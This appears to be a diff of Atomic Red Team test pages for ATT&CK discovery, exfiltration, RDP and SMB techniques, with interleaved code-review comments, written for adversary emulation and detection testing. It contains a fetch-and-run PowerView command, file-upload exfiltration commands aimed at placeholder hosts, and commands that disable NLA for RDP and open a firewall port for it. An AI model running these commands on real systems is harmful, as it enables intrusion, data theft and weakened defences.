if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") {exit 0} else {exit 1}
```
###### Get Prereq Commands
##### Get Prereq Commands:
```powershell
New-Item -Type Directory (split-path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") -ErrorAction ignore | Out-Null
Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/bin/AdFind.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe"
```
### Atomic Test #12: Remote System Discovery - ip neighbour
<br/>
<br/>
## Atomic Test #12 - Remote System Discovery - ip neighbour
Use the ip neighbour command to display the known link layer (ARP table) addresses for hosts sharing the same network segment.
**Supported Platforms:** Linux
**auto_generated_guid:** `158bd4dd-6359-40ab-b13c-285b9ef6fa25`
#### Attack Commands: Run with `sh`!
**auto_generated_guid:** 158bd4dd-6359-40ab-b13c-285b9ef6fa25
#### Attack Commands: Run with `sh`!
```sh
ip neighbour show
```
#### Dependencies: Run with `sh`!
#### Dependencies: Run with `sh`!
##### Description: Check if ip command exists on the machine
###### Check Prereq Commands
##### Check Prereq Commands:
```sh
if [ -x "$(command -v ip)" ]; then exit 0; else exit 1; fi;
```
###### Get Prereq Commands
##### Get Prereq Commands:
```sh
apt-get install iproute2 -y
```
### Atomic Test #13: Remote System Discovery - ip route
<br/>
<br/>
## Atomic Test #13 - Remote System Discovery - ip route
Use the ip route command to display the kernels routing tables.
**Supported Platforms:** Linux
**auto_generated_guid:** `1a4ebe70-31d0-417b-ade2-ef4cb3e7d0e1`
#### Attack Commands: Run with `sh`!
**auto_generated_guid:** 1a4ebe70-31d0-417b-ade2-ef4cb3e7d0e1
#### Attack Commands: Run with `sh`!
```sh
ip route show
```
#### Dependencies: Run with `sh`!
#### Dependencies: Run with `sh`!
##### Description: Check if ip command exists on the machine
###### Check Prereq Commands
##### Check Prereq Commands:
```sh
if [ -x "$(command -v ip)" ]; then exit 0; else exit 1; fi;
```
###### Get Prereq Commands
##### Get Prereq Commands:
```sh
apt-get install iproute2 -y
```
### Atomic Test #14: Remote System Discovery - netstat
<br/>
<br/>
## Atomic Test #14 - Remote System Discovery - netstat
Use the netstat command to display the kernels routing tables.
**Supported Platforms:** Linux
**auto_generated_guid:** `d2791d72-b67f-4615-814f-ec824a91f514`
#### Attack Commands: Run with `sh`!
**auto_generated_guid:** d2791d72-b67f-4615-814f-ec824a91f514
#### Attack Commands: Run with `sh`!
```sh
netstat -r | grep default
```
### Atomic Test #15: Remote System Discovery - ip tcp_metrics
<br/>
<br/>
## Atomic Test #15 - Remote System Discovery - ip tcp_metrics
Use the ip tcp_metrics command to display the recent cached entries for IPv4 and IPv6 source and destination addresses.
**Supported Platforms:** Linux
**auto_generated_guid:** `6c2da894-0b57-43cb-87af-46ea3b501388`
#### Attack Commands: Run with `sh`!
**auto_generated_guid:** 6c2da894-0b57-43cb-87af-46ea3b501388
#### Attack Commands: Run with `sh`!
```sh
ip tcp_metrics show |grep --invert-match "^127\."
```
#### Dependencies: Run with `sh`!
#### Dependencies: Run with `sh`!
##### Description: Check if ip command exists on the machine
###### Check Prereq Commands
##### Check Prereq Commands:
```sh
if [ -x "$(command -v ip)" ]; then exit 0; else exit 1; fi;
```
###### Get Prereq Commands
##### Get Prereq Commands:
```sh
apt-get install iproute2 -y
```
### Atomic Test #16: Enumerate domain computers within Active Directory using DirectorySearcher
<br/>
<br/>
## Atomic Test #16 - Enumerate domain computers within Active Directory using DirectorySearcher
This test is a Powershell script that enumerates Active Directory to determine computers that are joined to the domain.
This test is designed to mimic how SessionGopher can determine the additional systems within a domain, which has been used before by threat actors to aid in lateral movement.
Reference: [Head Fake: Tackling Disruptive Ransomware Attacks](https://www.mandiant.com/resources/head-fake-tackling-disruptive-ransomware-attacks).
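Review bot: the get-prereq step for Atomic Test #9, `& "#{venv_path}\Scripts\pip.exe" install --no-cache-dir adidnsdump 2>&1 | Out-Null`, discards stderr together with stdout, so a failed install only surfaces later as the check-prereq `Get-Command "#{venv_path}\Scripts\adidnsdump"` failing with no diagnostic; dropping the `2>&1` (or writing the output to a log file) keeps the failure visible. Two smaller points in the same hunk: the descriptions of Atomic Tests #13 and #14 read `kernels routing tables` (kernel's), and the `ip` get-prereq steps in Tests #12, #13 and #15 run `apt-get install iproute2 -y` only, while the `arp` step in Test #6 handles both `yum` and `apt-get`.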
@@ -474,9 +657,16 @@ Upon successful execution, this test will output the names of the computers that
**Supported Platforms:** Windows
**auto_generated_guid:** `962a6017-1c09-45a6-880b-adc9c57cb22e`
#### Attack Commands: Run with `powershell`!
**auto_generated_guid:** 962a6017-1c09-45a6-880b-adc9c57cb22e
#### Attack Commands: Run with `powershell`!
```powershell
$DirectorySearcher = New-Object System.DirectoryServices.DirectorySearcher("(ObjectCategory=Computer)")
@@ -489,143 +679,221 @@ foreach ($Computer in $Computers) {
```
#### Dependencies: Run with `powershell`!
#### Dependencies: Run with `powershell`!
##### Description: This PC must be joined to a domain.
###### Check Prereq Commands
##### Check Prereq Commands:
```powershell
if ((Get-WmiObject -Class Win32_ComputerSystem).partofdomain -eq $true) {exit 0} else {exit 1}
```
###### Get Prereq Commands
##### Get Prereq Commands:
```powershell
write-host "This PC must be manually added to a domain."
```
### Atomic Test #17: Enumerate Active Directory Computers with Get-AdComputer
<br/>
<br/>
## Atomic Test #17 - Enumerate Active Directory Computers with Get-AdComputer
The following Atomic test will utilize Get-AdComputer to enumerate Computers within Active Directory.
Upon successful execution a listing of Computers will output with their paths in AD.
Reference: https://github.com/MicrosoftDocs/windows-powershell-docs/blob/main/docset/winserver2022-ps/activedirectory/Get-ADComputer.md
**Supported Platforms:** Windows
**auto_generated_guid:** `97e89d9e-e3f5-41b5-a90f-1e0825df0fdf`
#### Attack Commands: Run with `powershell`!
**auto_generated_guid:** 97e89d9e-e3f5-41b5-a90f-1e0825df0fdf
#### Attack Commands: Run with `powershell`!
```powershell
Get-AdComputer -Filter *
```
### Atomic Test #18: Enumerate Active Directory Computers with ADSISearcher
<br/>
<br/>
## Atomic Test #18 - Enumerate Active Directory Computers with ADSISearcher
The following Atomic test will utilize ADSISearcher to enumerate computers within Active Directory.
Upon successful execution a listing of computers will output with their paths in AD.
Reference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearcher-type-accelerator-to-search-active-directory/
**Supported Platforms:** Windows
**auto_generated_guid:** `64ede6ac-b57a-41c2-a7d1-32c6cd35397d`
#### Attack Commands: Run with `powershell`!
**auto_generated_guid:** 64ede6ac-b57a-41c2-a7d1-32c6cd35397d
#### Attack Commands: Run with `powershell`!
```powershell
([adsisearcher]"objectcategory=computer").FindAll(); ([adsisearcher]"objectcategory=computer").FindOne()
```
### Atomic Test #19: Get-DomainController with PowerView
<br/>
<br/>
## Atomic Test #19 - Get-DomainController with PowerView
Utilizing PowerView, run Get-DomainController to identify the Domain Controller. Upon execution, information about the domain controller within the domain will be displayed.
**Supported Platforms:** Windows
**auto_generated_guid:** `b9d2e8ca-5520-4737-8076-4f08913da2c4`
#### Attack Commands: Run with `powershell`!
**auto_generated_guid:** b9d2e8ca-5520-4737-8076-4f08913da2c4
#### Attack Commands: Run with `powershell`!
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainController -verbose
```
### Atomic Test #20: Get-WmiObject to Enumerate Domain Controllers
<br/>
<br/>
## Atomic Test #20 - Get-WmiObject to Enumerate Domain Controllers
The following Atomic test will utilize get-wmiobject to enumerate Active Directory for Domain Controllers.
Upon successful execution a listing of Systems from AD will output with their paths.
Reference: https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-wmiobject?view=powershell-5.1
**Supported Platforms:** Windows
**auto_generated_guid:** `e3cf5123-f6c9-4375-bdf2-1bb3ba43a1ad`
#### Attack Commands: Run with `powershell`!
**auto_generated_guid:** e3cf5123-f6c9-4375-bdf2-1bb3ba43a1ad
#### Attack Commands: Run with `powershell`!
```powershell
try { get-wmiobject -class ds_computer -namespace root\directory\ldap -ErrorAction Stop }
catch { $_; exit $_.Exception.HResult }
```
### Atomic Test #21: Remote System Discovery - net group Domain Controller
<br/>
<br/>
## Atomic Test #21 - Remote System Discovery - net group Domain Controller
Identify remote systems with net.exe querying the Active Directory Domain Controller.
Upon successful execution, cmd.exe will execute cmd.exe against Active Directory to list the "Domain Controller" in the domain. Output will be via stdout.
**Supported Platforms:** Windows
**auto_generated_guid:** `5843529a-5056-4bc1-9c13-a311e2af4ca0`
#### Attack Commands: Run with `command_prompt`!
**auto_generated_guid:** 5843529a-5056-4bc1-9c13-a311e2af4ca0
#### Attack Commands: Run with `command_prompt`!
```cmd
net group /domain "Domain controllers"
```
### Atomic Test #22: Enumerate Remote Hosts with Netscan
<br/>
<br/>
## Atomic Test #22 - Enumerate Remote Hosts with Netscan
This test uses Netscan to identify remote hosts in a specified network range.
**Supported Platforms:** Windows
**auto_generated_guid:** `b8147c9a-84db-4ec1-8eee-4e0da75f0de5`
#### Inputs
**auto_generated_guid:** b8147c9a-84db-4ec1-8eee-4e0da75f0de5
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| netscan_path | NetScan exe location | path | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;netscan&#92;64-bit&#92;netscan.exe|
| range_to_scan | The IP range to scan with Netscan | string | 127.0.0.1-127.0.0.1|
#### Attack Commands: Run with `powershell`!
#### Attack Commands: Run with `powershell`!
```powershell
cmd /c '#{netscan_path}' /hide /auto:"$env:temp\T1018NetscanOutput.txt" /range:'#{range_to_scan}'
```
#### Cleanup Commands
#### Cleanup Commands:
```powershell
remove-item "$env:temp\T1018NetscanOutput.txt" -force -erroraction silentlycontinue
```
#### Dependencies: Run with `powershell`!
#### Dependencies: Run with `powershell`!
##### Description: Netscan must be installed
###### Check Prereq Commands
##### Check Prereq Commands:
```powershell
if (Test-Path "#{netscan_path}") {exit 0} else {exit 1}
```
###### Get Prereq Commands
##### Get Prereq Commands:
```powershell
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest -OutFile "PathToAtomicsFolder\..\ExternalPayloads\netscan.zip" "https://www.softperfect.com/download/files/netscan_portable.zip"
Expand-Archive -LiteralPath "PathToAtomicsFolder\..\ExternalPayloads\netscan.zip" -DestinationPath "PathToAtomicsFolder\..\ExternalPayloads\netscan"
```
<br/>
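Review bot: Atomic Test #19 executes PowerView straight from `https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1`, that is, whatever is on the `master` branch at run time, with no pinned commit and no integrity check; pinning the URL to a specific commit, or shipping the script under ExternalPayloads behind a check-prereq the way the AdFind and Netscan tests do, makes the test reproducible and keeps the content that gets executed under the repository's control. Also, the Atomic Test #21 description says `cmd.exe will execute cmd.exe against Active Directory`, but the command shown is `net group /domain "Domain controllers"`, so the second `cmd.exe` should read `net.exe`.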
+45 -19
View File
@@ -1,36 +1,45 @@
# T1020 - Automated Exfiltration
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1020)
<blockquote>
## Description from ATT&CK
Adversaries may exfiltrate data, such as sensitive documents, through the use of automated processing after being gathered during Collection.(Citation: ESET Gamaredon June 2020)
> Adversaries may exfiltrate data, such as sensitive documents, through the use of automated processing after being gathered during Collection.(Citation: ESET Gamaredon June 2020)
>
> When automated exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as [Exfiltration Over C2 Channel](https://attack.mitre.org/techniques/T1041) and [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).
When automated exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as [Exfiltration Over C2 Channel](https://attack.mitre.org/techniques/T1041) and [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).
[Source](https://attack.mitre.org/techniques/T1020)
</blockquote>
## Atomic Tests
- [Atomic Test #1: IcedID Botnet HTTP PUT](#atomic-test-1-icedid-botnet-http-put)
- [Atomic Test #2: Exfiltration via Encrypted FTP](#atomic-test-2-exfiltration-via-encrypted-ftp)
- [Atomic Test #1 - IcedID Botnet HTTP PUT](#atomic-test-1---icedid-botnet-http-put)
### Atomic Test #1: IcedID Botnet HTTP PUT
- [Atomic Test #2 - Exfiltration via Encrypted FTP](#atomic-test-2---exfiltration-via-encrypted-ftp)
<br/>
## Atomic Test #1 - IcedID Botnet HTTP PUT
Creates a text file
Tries to upload to a server via HTTP PUT method with ContentType Header
Deletes a created file
**Supported Platforms:** Windows
**auto_generated_guid:** `9c780d3d-3a14-4278-8ee5-faaeb2ccfbe0`
#### Inputs
**auto_generated_guid:** 9c780d3d-3a14-4278-8ee5-faaeb2ccfbe0
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file | Exfiltration File | string | C:&#92;temp&#92;T1020_exfilFile.txt|
| domain | Destination Domain | url | https://google.com|
#### Attack Commands: Run with `powershell`!
#### Attack Commands: Run with `powershell`!
```powershell
$fileName = "#{file}"
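Review bot: the Atomic Test #1 description is three separate lines (`Creates a text file`, `Tries to upload to a server via HTTP PUT method with ContentType Header`, `Deletes a created file`) with no list markers or line breaks, so markdown renders them as one run-on sentence; since this hunk is reworking the surrounding headings anyway, turning them into a list (or ending each line with a hard break) would make the three steps read as intended.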
@@ -40,29 +49,41 @@ $contentType = "application/octet-stream"
try {Invoke-WebRequest -Uri $url -Method Put -ContentType $contentType -InFile $fileName} catch{}
```
#### Cleanup Commands
#### Cleanup Commands:
```powershell
$fileName = "#{file}"
Remove-Item -Path $fileName -ErrorAction Ignore
```
### Atomic Test #2: Exfiltration via Encrypted FTP
<br/>
<br/>
## Atomic Test #2 - Exfiltration via Encrypted FTP
Simulates encrypted file transfer to an FTP server. For testing purposes, a free FTP testing portal is available at https://sftpcloud.io/tools/free-ftp-server, providing a temporary FTP server for 60 minutes. Use this service responsibly for testing and validation only.
**Supported Platforms:** Windows
**auto_generated_guid:** `5b380e96-b0ef-4072-8a8e-f194cb9eb9ac`
#### Inputs
**auto_generated_guid:** 5b380e96-b0ef-4072-8a8e-f194cb9eb9ac
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| sampleFile | Path of the sample file to exfiltrate. | String | C:&#92;temp&#92;T1020__FTP_sample.txt|
| ftpServer | FTP server URL. | Url | ftp://example.com|
| credentials | FTP server credentials. | String | [user:password]|
#### Attack Commands: Run with `powershell`!
#### Attack Commands: Run with `powershell`!
```powershell
$sampleData = "Sample data for exfiltration test"
@@ -72,8 +93,13 @@ $creds = Get-Credential -Credential "#{credentials}"
Invoke-WebRequest -Uri $ftpUrl -Method Put -InFile "#{sampleFile}" -Credential $creds
```
#### Cleanup Commands
#### Cleanup Commands:
```powershell
Remove-Item -Path "#{sampleFile}" -ErrorAction Ignore
```
<br/>
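Review bot: Atomic Test #2 is titled `Exfiltration via Encrypted FTP` and its description says it `Simulates encrypted file transfer`, but the `ftpServer` default is `ftp://example.com` and the upload is `Invoke-WebRequest -Uri $ftpUrl -Method Put -InFile "#{sampleFile}" -Credential $creds`; nothing in the visible lines requests TLS, so with an `ftp://` URI the credentials and the file go over the wire in cleartext unless the elided `$ftpUrl` construction changes the scheme. Either the test should document how TLS is actually negotiated (and default to a server URI that supports it), or the title and description should not claim encryption.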
+89 -42
View File
@@ -1,32 +1,41 @@
# T1021.001 - Remote Services: Remote Desktop Protocol
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1021/001)
<blockquote>
## Description from ATT&CK
Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.
> Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.
>
> Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).(Citation: TechNet Remote Desktop Services)
>
> Adversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials. Adversaries will likely use Credential Access techniques to acquire credentials to use with RDP. Adversaries may also use RDP in conjunction with the [Accessibility Features](https://attack.mitre.org/techniques/T1546/008) or [Terminal Services DLL](https://attack.mitre.org/techniques/T1505/005) for Persistence.(Citation: Alperovitch Malware)
Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).(Citation: TechNet Remote Desktop Services)
[Source](https://attack.mitre.org/techniques/T1021/001)
Adversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials. Adversaries will likely use Credential Access techniques to acquire credentials to use with RDP. Adversaries may also use RDP in conjunction with the [Accessibility Features](https://attack.mitre.org/techniques/T1546/008) or [Terminal Services DLL](https://attack.mitre.org/techniques/T1505/005) for Persistence.(Citation: Alperovitch Malware)
</blockquote>
## Atomic Tests
- [Atomic Test #1: RDP to DomainController](#atomic-test-1-rdp-to-domaincontroller)
- [Atomic Test #2: Changing RDP Port to Non Standard Port via Powershell](#atomic-test-2-changing-rdp-port-to-non-standard-port-via-powershell)
- [Atomic Test #3: Changing RDP Port to Non Standard Port via Command_Prompt](#atomic-test-3-changing-rdp-port-to-non-standard-port-via-command_prompt)
- [Atomic Test #4: Disable NLA for RDP via Command Prompt](#atomic-test-4-disable-nla-for-rdp-via-command-prompt)
- [Atomic Test #1 - RDP to DomainController](#atomic-test-1---rdp-to-domaincontroller)
### Atomic Test #1: RDP to DomainController
- [Atomic Test #2 - Changing RDP Port to Non Standard Port via Powershell](#atomic-test-2---changing-rdp-port-to-non-standard-port-via-powershell)
- [Atomic Test #3 - Changing RDP Port to Non Standard Port via Command_Prompt](#atomic-test-3---changing-rdp-port-to-non-standard-port-via-command_prompt)
- [Atomic Test #4 - Disable NLA for RDP via Command Prompt](#atomic-test-4---disable-nla-for-rdp-via-command-prompt)
<br/>
## Atomic Test #1 - RDP to DomainController
Attempt an RDP session via Remote Desktop Application to a DomainController.
**Supported Platforms:** Windows
**auto_generated_guid:** `355d4632-8cb9-449d-91ce-b566d0253d3e`
#### Inputs
**auto_generated_guid:** 355d4632-8cb9-449d-91ce-b566d0253d3e
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| logonserver | ComputerName argument default %logonserver% | string | $ENV:logonserver.TrimStart("&#92;")|
@@ -34,7 +43,9 @@ Attempt an RDP session via Remote Desktop Application to a DomainController.
| username | Username argument default %username% | string | $ENV:USERNAME|
| password | Password | string | 1password2!|
#### Attack Commands: Run with `powershell`!
#### Attack Commands: Run with `powershell`!
```powershell
$Server=#{logonserver}
@@ -45,112 +56,148 @@ mstsc /v:$Server
echo "RDP connection established"
```
#### Cleanup Commands
#### Cleanup Commands:
```powershell
$p=Tasklist /svc /fi "IMAGENAME eq mstsc.exe" /fo csv | convertfrom-csv
if(-not ([string]::IsNullOrEmpty($p.PID))) { Stop-Process -Id $p.PID }
```
#### Dependencies: Run with `powershell`!
#### Dependencies: Run with `powershell`!
##### Description: Computer must be domain joined
###### Check Prereq Commands
##### Check Prereq Commands:
```powershell
if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) { exit 0} else { exit 1}
```
###### Get Prereq Commands
##### Get Prereq Commands:
```powershell
Write-Host Joining this computer to a domain must be done manually
```
### Atomic Test #2: Changing RDP Port to Non Standard Port via Powershell
<br/>
<br/>
## Atomic Test #2 - Changing RDP Port to Non Standard Port via Powershell
Changing RDP Port to Non Standard Port via Powershell
**Supported Platforms:** Windows
**auto_generated_guid:** `2f840dd4-8a2e-4f44-beb3-6b2399ea3771`
#### Inputs
**auto_generated_guid:** 2f840dd4-8a2e-4f44-beb3-6b2399ea3771
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| OLD_Remote_Port | Default RDP Listening Port | string | 3389|
| NEW_Remote_Port | New RDP Listening Port | string | 4489|
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -name "PortNumber" -Value #{NEW_Remote_Port}
New-NetFirewallRule -DisplayName 'RDPPORTLatest-TCP-In' -Profile 'Public' -Direction Inbound -Action Allow -Protocol TCP -LocalPort #{NEW_Remote_Port}
```
#### Cleanup Commands
#### Cleanup Commands:
```powershell
Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -name "PortNumber" -Value #{OLD_Remote_Port}
Remove-NetFirewallRule -DisplayName "RDPPORTLatest-TCP-In" -ErrorAction Ignore
Get-Service TermService | Restart-Service -Force -ErrorAction Ignore
```
### Atomic Test #3: Changing RDP Port to Non Standard Port via Command_Prompt
<br/>
<br/>
## Atomic Test #3 - Changing RDP Port to Non Standard Port via Command_Prompt
Changing RDP Port to Non Standard Port via Command_Prompt
**Supported Platforms:** Windows
**auto_generated_guid:** `74ace21e-a31c-4f7d-b540-53e4eb6d1f73`
#### Inputs
**auto_generated_guid:** 74ace21e-a31c-4f7d-b540-53e4eb6d1f73
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| OLD_Remote_Port | Default RDP Listening Port | string | 3389|
| NEW_Remote_Port | New RDP Listening Port | string | 4489|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d #{NEW_Remote_Port} /f
netsh advfirewall firewall add rule name="RDPPORTLatest-TCP-In" dir=in action=allow protocol=TCP localport=#{NEW_Remote_Port}
```
#### Cleanup Commands
#### Cleanup Commands:
```cmd
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d #{OLD_Remote_Port} /f >nul 2>&1
netsh advfirewall firewall delete rule name="RDPPORTLatest-TCP-In" >nul 2>&1
net stop TermService /y >nul 2>&1
net start TermService >nul 2>&1
```
### Atomic Test #4: Disable NLA for RDP via Command Prompt
<br/>
<br/>
## Atomic Test #4 - Disable NLA for RDP via Command Prompt
Disables network-level authentication (NLA) for RDP by changing a registry key via Command Prompt
Disabling NLA for RDP can allow remote user interaction with the Windows sign-in screen prior to authentication. According to Microsoft, Flax Typhoon actors used this technique implementation to achieve persistence on victim systems: https://www.microsoft.com/en-us/security/blog/2023/08/24/flax-typhoon-using-legitimate-software-to-quietly-access-taiwanese-organizations/
See also: https://github.com/EmpireProject/Empire/blob/master/lib/modules/powershell/management/enable_rdp.py
**Supported Platforms:** Windows
**auto_generated_guid:** `01d1c6c0-faf0-408e-b368-752a02285cb2`
#### Inputs
**auto_generated_guid:** 01d1c6c0-faf0-408e-b368-752a02285cb2
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| Default_UserAuthentication | Default UserAuthentication registry value | string | 1|
#### Attack Commands: Run with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```cmd
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /d 0 /t REG_DWORD /f
```
#### Cleanup Commands
#### Cleanup Commands:
```cmd
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /d #{Default_UserAuthentication} /t REG_DWORD -f >nul 2>&1
```
<br/>
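Review bot: Atomic Test #4's attack header reads `Run with command_prompt!` with no `Elevation Required`, yet the command writes `UserAuthentication` under `HKEY_LOCAL_MACHINE\SYSTEM`, which needs an elevated prompt; the two tests above that edit the same `RDP-Tcp` key are marked elevated, so the YAML this page is generated from should carry `elevation_required: true` for this test too, otherwise an executor runs it unprivileged and reports a spurious failure. Separately, the cleanup uses `reg add ... -f` where every other `reg add` in the file uses `/f`; because the cleanup's output is sent to `>nul 2>&1`, a rejected switch would leave NLA disabled with nothing shown, so use `/f` there as well.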
+85 -34
View File
@@ -1,32 +1,41 @@
# T1021.002 - Remote Services: SMB/Windows Admin Shares
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1021/002)
<blockquote>
## Description from ATT&CK
Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with a remote network share using Server Message Block (SMB). The adversary may then perform actions as the logged-on user.
> Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with a remote network share using Server Message Block (SMB). The adversary may then perform actions as the logged-on user.
>
> SMB is a file, printer, and serial port sharing protocol for Windows machines on the same network or domain. Adversaries may use SMB to interact with file shares, allowing them to move laterally throughout a network. Linux and macOS implementations of SMB typically use Samba.
>
> Windows systems have hidden network shares that are accessible only to administrators and provide the ability for remote file copy and other administrative functions. Example network shares include `C$`, `ADMIN$`, and `IPC$`. Adversaries may use this technique in conjunction with administrator-level [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely access a networked system over SMB,(Citation: Wikipedia Server Message Block) to interact with systems using remote procedure calls (RPCs),(Citation: TechNet RPC) transfer files, and run transferred binaries through remote Execution. Example execution techniques that rely on authenticated sessions over SMB/RPC are [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), [Service Execution](https://attack.mitre.org/techniques/T1569/002), and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047). Adversaries can also use NTLM hashes to access administrator shares on systems with [Pass the Hash](https://attack.mitre.org/techniques/T1550/002) and certain configuration and patch levels.(Citation: Microsoft Admin Shares)
SMB is a file, printer, and serial port sharing protocol for Windows machines on the same network or domain. Adversaries may use SMB to interact with file shares, allowing them to move laterally throughout a network. Linux and macOS implementations of SMB typically use Samba.
[Source](https://attack.mitre.org/techniques/T1021/002)
Windows systems have hidden network shares that are accessible only to administrators and provide the ability for remote file copy and other administrative functions. Example network shares include `C$`, `ADMIN$`, and `IPC$`. Adversaries may use this technique in conjunction with administrator-level [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely access a networked system over SMB,(Citation: Wikipedia Server Message Block) to interact with systems using remote procedure calls (RPCs),(Citation: TechNet RPC) transfer files, and run transferred binaries through remote Execution. Example execution techniques that rely on authenticated sessions over SMB/RPC are [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), [Service Execution](https://attack.mitre.org/techniques/T1569/002), and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047). Adversaries can also use NTLM hashes to access administrator shares on systems with [Pass the Hash](https://attack.mitre.org/techniques/T1550/002) and certain configuration and patch levels.(Citation: Microsoft Admin Shares)
</blockquote>
## Atomic Tests
- [Atomic Test #1: Map admin share](#atomic-test-1-map-admin-share)
- [Atomic Test #2: Map Admin Share PowerShell](#atomic-test-2-map-admin-share-powershell)
- [Atomic Test #3: Copy and Execute File with PsExec](#atomic-test-3-copy-and-execute-file-with-psexec)
- [Atomic Test #4: Execute command writing output to local Admin Share](#atomic-test-4-execute-command-writing-output-to-local-admin-share)
- [Atomic Test #1 - Map admin share](#atomic-test-1---map-admin-share)
### Atomic Test #1: Map admin share
- [Atomic Test #2 - Map Admin Share PowerShell](#atomic-test-2---map-admin-share-powershell)
- [Atomic Test #3 - Copy and Execute File with PsExec](#atomic-test-3---copy-and-execute-file-with-psexec)
- [Atomic Test #4 - Execute command writing output to local Admin Share](#atomic-test-4---execute-command-writing-output-to-local-admin-share)
<br/>
## Atomic Test #1 - Map admin share
Connecting To Remote Shares
**Supported Platforms:** Windows
**auto_generated_guid:** `3386975b-367a-4fbb-9d77-4dcf3639ffd3`
#### Inputs
**auto_generated_guid:** 3386975b-367a-4fbb-9d77-4dcf3639ffd3
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| user_name | Username | string | DOMAIN&#92;Administrator|
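Review bot: The ATT&CK description is now wrapped in a raw `<blockquote>` HTML block instead of `>` lines; in GitHub-flavored markdown an HTML block runs to the next blank line as literal HTML, so unless the generator emits a blank line after `<blockquote>` and before `</blockquote>`, the `[Valid Accounts](...)` and other ATT&CK links inside the quote will render as literal bracket text. Worth checking the rendered page once; the `>` form this replaces did not have that problem.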
@@ -34,69 +43,94 @@ Connecting To Remote Shares
| password | Password | string | P@ssw0rd1|
| computer_name | Target Computer Name | string | Target|
#### Attack Commands: Run with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```cmd
cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password} /u:#{user_name}"
```
### Atomic Test #2: Map Admin Share PowerShell
<br/>
<br/>
## Atomic Test #2 - Map Admin Share PowerShell
Map Admin share utilizing PowerShell
**Supported Platforms:** Windows
**auto_generated_guid:** `514e9cd7-9207-4882-98b1-c8f791bae3c5`
#### Inputs
**auto_generated_guid:** 514e9cd7-9207-4882-98b1-c8f791bae3c5
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| share_name | Examples C$, IPC$, Admin$ | string | C$|
| map_name | Mapped Drive Letter | string | g|
| computer_name | Target Computer Name | string | Target|
#### Attack Commands: Run with `powershell`!
#### Attack Commands: Run with `powershell`!
```powershell
New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{share_name}
```
### Atomic Test #3: Copy and Execute File with PsExec
<br/>
<br/>
